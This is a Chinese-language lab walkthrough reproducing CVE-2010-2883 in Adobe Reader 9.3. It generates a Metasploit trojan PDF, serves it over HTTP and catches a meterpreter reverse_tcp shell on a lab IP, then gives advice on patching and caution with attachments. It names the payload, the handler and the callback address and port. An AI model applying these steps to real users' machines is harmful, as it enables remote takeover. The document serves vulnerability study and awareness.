1、漏洞原理
Adobe Reader在处理CoolType字体文件的sing表时,存在栈溢出漏洞,当打开特制的恶意PDF文件时,可允许任意代码远程执行
影响版本:Adobe Reader 8.2.4 - 9.3.4
2、漏洞复现环境
Kali Linux + Windows 7 sp1
渗透机:Kali Linux (ip:192.168.43.177)
靶机:Windows 7 sp1 (ip:192.168.43.196)
软件:Adobe Reader 9.3.exe 下载地址ftp://ftp.adobe.com/pub/adobe/reader/win/9.x/9.3/chs/AdbeRdr930_zh_CN.exe
3、实验流程
3.1 进入Kali Linux,使用Metasploit生成PDF木马文件
生成木马pdf,回连地址为192.168.43.177,端口为4444
3.2 将pdf木马拷贝到windows
在kali上搭建http服务器,windows下载测试pdf文件
下载地址为htttp://192.168.43.177:8000/CVE-2010-2883.pdf
3.3 Metasploit开启shell监听会话,等待肉鸡上线
使用expolit/multi/handler
set payload windows/meterpreter/reverse_tcp
监听的地址和端口与上面的一致
3.4 在Windows 7安装Adobe Reader 9.3,打开pdf
使用Adobe Reader 9.3打开木马pdf,会卡壳
3.5 Metasploit获取shell会话,并用Meterpreter控制肉鸡
切换进程,getshell
切换进程(考虑到这个漏洞利用过程,adobe reader会“卡壳”退出,所以需要快速切换到其他系统进程,这样会话才不会失效)
4、实验总结:
可以看到,最终由于Adobe Reader 存在CVE-2010-2883这个高危漏洞,导致电脑打开特殊定制的pdf之后,直接变成肉鸡。与之前文章中的Office和Flash 0day漏洞类似,真实环境下,很多黑客会利用此方法,结合社会工程学,例如通过诱导邮件、各种论坛、QQ群、微信群等多渠道,诱导用户下载并打开,而只要打开的用户,就直接中招。
在这里也呼吁大家:平常要非常小心陌生办公文件,无论是pdf还是word等,打开之前一定要明确来源,或者用杀毒软件先杀毒,再打开。另外,就是尽量保证电脑的软件处于最新版,这样才能最大程度降低被攻击的几率。
5、 漏洞修复
①直接到Adobe官网,下载Adobe Reader最新版本;
②安装常见杀毒软件,开启实时防护和杀毒引擎实时升级
